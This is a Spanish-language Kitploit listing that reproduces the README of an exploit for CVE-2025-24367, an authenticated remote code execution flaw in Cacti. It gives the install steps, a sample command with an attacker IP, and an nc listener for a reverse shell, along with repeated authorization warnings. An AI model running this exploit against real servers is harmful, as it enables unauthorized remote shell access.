Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24367 — Exploit de ejecución remota de código autenticado para la vulnerabilidad de plantilla de gráficos de Cacti, con payload de shell inversa y soporte de proxy para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/shoshinmaster/cve-2025-24367
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

Exploit de ejecución remota de código autenticado para la vulnerabilidad de plantilla de gráficos de Cacti, con payload de shell inversa y soporte de proxy para pruebas de penetración autorizadas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
12hace 7 mesesAún no revisado
Compartir

CVE-2025-24367 - Cacti Autenticación de Plantilla de Gráfico RCE

Uso y Seguridad

Importante — Lee esto primero:
Este repositorio y exploit.py se proporcionan solo con fines educativos y de investigación. No uses este código contra sistemas, redes o servicios para los cuales no tengas autorización explícita y por escrito. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Al usar este código aceptas cumplir con las leyes aplicables y las políticas institucionales.


Requisitos

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Uso

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

Ejemplo

Antes de ejecutar el script, asegúrate de tener un listener nc en funcionamiento. Ejecuta el script sin proxy a menos que estés depurando:

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

ADVERTENCIAS MUY IMPORTANTES

  • No ejecutes esto contra sistemas de producción ni contra ningún sistema que no poseas o para el cual no tengas permiso explícito para realizar pruebas.
  • Siempre obtén autorización por escrito antes de realizar pruebas de seguridad.
  • Utiliza entornos de laboratorio aislados (por ejemplo, máquinas virtuales, contenedores o redes de prueba específicas) para experimentar.
  • Tu organización puede tener políticas de reporte y divulgación — síguelas.
  • Los autores no aceptan ninguna responsabilidad por el mal uso de este código.

Recordatorio final: Este script y README son solo para uso educativo. Nunca uses estas herramientas para acceder a sistemas ilegalmente.

Descargar herramienta